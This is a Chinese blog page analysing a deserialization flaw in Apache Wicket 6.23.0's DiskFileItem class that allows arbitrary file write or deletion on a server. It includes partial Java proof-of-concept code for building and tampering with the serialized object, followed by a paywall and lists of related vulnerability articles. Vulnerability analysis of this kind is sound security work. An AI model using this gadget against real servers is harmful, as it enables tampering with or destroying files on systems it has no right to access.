Apache Wicket 6.23.0 – Deserialization gadget

最新推荐文章于 2024-06-05 14:18:42 发布
原创 最新推荐文章于 2024-06-05 14:18:42 发布 · 724 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了Apache Wicket 6.23.0版本的一个反序列化漏洞,该漏洞允许攻击者远程写入或删除服务器文件。通过修改序列化的DiskFileItem对象,攻击者能控制文件存储位置。尽管修复措施已实施,但利用难度较高。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >




Apacge Wicket简介:

Wicket是一个Java 语言的Web开发框架,与Struts,WebWork,Tapestry   相类似。其特点在于对Html和代码进行了有效的分离(有利于程序员和美工的合作),基于规则的配置(减少了XML   等配置文件的使用),学习曲线较低(开发方式与C/S相似),更加易于调试(错误类型比较少,而且容易定位)。


摘要:

Apache Wichet6.23.0项目的反序列化漏洞,这个漏洞没有Common Collection library危害大但是找到它是非常有趣的。这个漏洞允许写入远程文件到服务器本地文件中或删除服务器上面的任意文件。这个漏洞跟CVE-2013-2186相似。Apacge Wichet开发者复制粘贴了 Common Upload组件中"DiskFileItem" 类。


要演示这种攻击,需要服务器反序列化这个对象(例如通过RMI端口),你需要设置在服务器可以写可读的位置(例如共享目录或Web服务器根目录下的目录)。


漏洞描述:

在Apache Wicket的项目的6.23.0版本的“DiskFileItem”类反序列化过程中允许任意的远程文件写入到服务器的本地文件。


首先攻击者序列化一个DiskFileItem对象

package com.serialise;

import org.apache.wicket.util.file.FileCleaner;
import org.apache.wicket.util.io.DeferredFileOutputStream;
import org.apache.wicket.util.upload.DiskFileItem;

import java.io.*;
import java.net.URI;

/**
 * Created by H4ck0rInj on 2016/9/27.
 */
public class Test{
 
 
   public static void main(String argv[]){
 
 
       try {
 
 
           String contentType = "UTF-8";
           boolean isFormField = true;
           String fileName = "test.txt";
           int sizeThreshold = 4;
           File repository = new File(new URI("file:///D:/HACK/"));
           FileCleaner fileUploadCleaner = new FileCleaner();
           DiskFileItem dfi =new DiskFileItem(fileName,contentType,isFormField,fileName,sizeThreshold,repository,fileUploadCleaner);

           DeferredFileOutputStream os = (DeferredFileOutputStream) dfi.getOutputStream();
           System.out.println(os.isThresholdExceeded());
           byte[] data = dfi.get();
           os.write(fileName.getBytes());
           FileOutputStream fos = new FileOutputStream("D:\\fileitem.ser");
           ObjectOutputStream oos = new ObjectOutputStream(fos);
           oos.writeObject(dfi);
       }catch (Exception e) {
 
 

       }
   }
}

然后攻击者将修改序列化对象。要修改的是要在红圈的地方将被复制的内容和内容要被复制的目录。它们都是Java File对象,所以他们能够支持URI参数。


这个Poc我们修改了原始的path和respository变量的指向。

System.out.println("Start");
FileInputStream fis = new FileInputStream("D:\\fileitem.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
DiskFileItem nameFromDisk = (DiskFileItem)ois.readObject();
System.out.println("End");
fos.close();


最低0.47元/天 解锁文章

200万优质内容无限畅学
文件解析漏洞总结-Apache
若水斋
08-10 2万+
本文详细论述、测试了Apache的三种文件解析漏洞:多后缀名、罕见后缀和利用.htaccess
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 2万+
1.漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2.漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
【亲测免费】 Wicket-tutorial-examples: 全面学习Apache Wicket框架的教程示例集合
gitblog_00020的博客
03-17 644
Wicket-tutorial-examples: 全面学习Apache Wicket框架的教程示例集合 项目简介 Wicket-tutorial-examples是一个由开源开发者Bitstorm创建的项目,旨在提供一系列全面的学习教程和示例代码,帮助开发者快速理解和掌握Apache Wicket框架。 Apache Wicket是一款功能强大的Java Web开发框架,它将页面与组件分离,使得...
CVE-2016-1000031 Apache Commons FileUpload 反序列化漏洞深入分析
沧海一粟
02-20 1万+
反序列化漏洞最近一直不得安宁,先有Apache Commons Collections通过反序列化实现远程代码执行,再有Spring RMI 反序列化漏洞,最新又有了common upload file的反序列化漏洞CVE-2016-1000031(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031) 漏洞原因 先来看
Apache Wicket框架
最新发布
LIUCHANGSHUO的博客
06-05 1958
4. 提供丰富的组件和功能:Apache Wicket 拥有丰富的组件库和功能,包括按钮、表单、文本框、下拉框等常用组件,以及一些高级组件和功能,如 Ajax 支持、模板引擎、验证器等。这样的组件树可以通过 Java 代码进行构建和管理,使得页面的布局和结构更加灵活和可控。5. 丰富的组件库:Apache Wicket 拥有丰富的组件库,包括按钮、表单、文本框、下拉框等常用组件,以及一些高级组件和功能,如 Ajax 支持、模板引擎、验证器等,方便开发人员快速构建功能强大的 Web 应用程序。
wicket-sample:示例 Apache Wicket Web 应用程序,用于使用 Apache Fortress 演示基本的 Java EE 安全性和 RBAC
07-23
本文档演示了如何获取、构建和部署 Apache Fortress Wicket 示例应用程序。 要完成本教程,请首先按照本 README 中的步骤进行操作。 接下来是这里的步骤: 先决条件 Java 8++ Apache Maven 3++ Apache Tomcat ...
Apache Wicket Cookbook
10-26
### Apache Wicket Cookbook知识点概述 #### 一、Apache Wicket简介 Apache Wicket是一款用于构建企业级Java Web应用程序的强大框架。它提供了一种简洁而强大的API来开发动态Web应用,支持组件重用、事件驱动以及...
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) 复现
yukinorong的博客
06-29 3412
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞。 反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
为org.apache.wicket.util.resource启用调试消息
一名可爱的技术搬运工
05-24 206
问题 在Wicket中,当找不到html页面时,它将引发“ 为org.apache.wicket.util.resource启用调试消息以获取所有尝试过的文件名的列表 ”。 想知道如何为Wicket资源启用调试消息? Root cause: org.apache.wicket.markup.MarkupNotFoundException: Markup of type 'html' f...
java代码审计手书(四)
一个码农的笔记
11-29 8287
翻译自:http://find-sec-bugs.github.io/bugs.htm 翻译:聂心明 外部文件访问(Android) 漏洞特征:ANDROID_EXTERNAL_FILE_ACCESS 应用经常往外部存储上写数据(可能是SD卡),这个操作可能会有多个安全问题。首先应用可以可以通过READ_EXTERNAL_STORAGE 获取SD卡上存储的文件。而且如果数据中包含用户的敏感信息的话...
apache wicket_您应该使用Apache Wicket的五个原因
专业的开发者“讨论”
07-10 652
apache wicket Apache Wicket是一个基于Java的Web开发框架。 我觉得它没有得到应有的关注。 在过去的6年中,我一直将Wicket专业用于现实世界的项目,并为之热心! 在本文中,让我们看一下应该考虑使用它的五个原因。 1.简单的状态管理 编写Wicket应用程序的开发经验与桌面开发非常相似。 有时您几乎会忘记HTTP的无状态本质。 这是因为在Wic...
apache wicket_教程– Apache Wicket:有趣的Web框架
06-30 1937
选择Java技术堆栈时,不乏多样性。 为了摆脱“滚动自己的(一切)”的想法,以至于很多公司都沦为猎物,而“一切都必须成为标准”的哲学,则对每一层都采取了各种各样的方法过去几年中,Java体系结构如雨后春笋般涌现。 UI层对于竞争技术的奋斗并不陌生。 有了提供的所有选项,您将如何选择? 尽管没有作家可以为您做出选择,但是我们可以做的是向您介绍您可能要考虑的另一种选择,希望它会引起您足够的兴趣并尝...
Spring Boot框架Whitelabel Error Page SpEL注入漏洞分析
c0c0cf的专栏
09-15 9577
微信公众号:DebugPwn 新浪微博:http://weibo.com/u/2275304001?refer_flag=1005055010_ SpEL Introduction The Spring Expression Language (SpEL for short) is a powerful expression language
由%5c爆库漏洞研究的绝对路径,相对路径和虚拟目录
c0c0cf的专栏
03-19 3796
通常情况下,数据库连接文件中的server.mappath()方法,可以正常获得物理路径,但是在浏览器中的连接被修改提交后,网页的相对路径就发生了变化,重而使得路径报错,报出数据库信息. ie特性,在浏览器中提交的连接地址中包含\浏览器会自动把 \ 转换为 /,重而访问到正确的连接地址。但是对于/小小的编码转换,就可避免ie的自动转化 %5是\的十六进制编码,当iis服务器收到用户提交的信息并作
甲方安全工作二三事
c0c0cf的专栏
09-25 2314
观点:保证基础设施安全的情况下,甲方安全是需要围绕着业务开展的,一切需要为业务服务,脱离业务去做安全是脱离企业竞争原则的,安全越贴近业务越好。 熟悉组织架构 1、熟悉组织架构,因为在甲方大多数工作是需要业务方配合的。了解一个业务线适合的安全接口人,最好对安全感兴趣并且对该业务线产品非常熟悉的人。快速了解公司的一些安全产品,每个产品提供怎么样场景的安全服务,向业务推广。 2、熟悉安
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 2111
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值